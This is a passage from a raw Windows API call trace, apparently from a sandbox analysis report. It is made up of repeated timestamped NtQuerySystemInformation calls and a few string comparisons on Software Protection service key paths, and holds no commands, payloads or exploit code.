SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x20, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x50, ResultLength=0x0) [0273.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0273.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0273.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0273.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0273.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0273.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x28, ResultLength=0x0) [0273.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0273.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x20, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x20, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e8, Length=0x50, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x28, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0273.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x28, ResultLength=0x0) [0273.069] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0273.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0273.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0273.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0273.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0273.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca40, Length=0x28, ResultLength=0x0) [0273.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0273.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0273.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0273.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x28, ResultLength=0x0) [0273.077] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0273.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0273.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0273.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0273.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0273.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca40, Length=0x28, ResultLength=0x0) [0273.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0273.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0273.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0273.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.084] NtQuerySystemInformation (SystemInformationClass=0xb9, 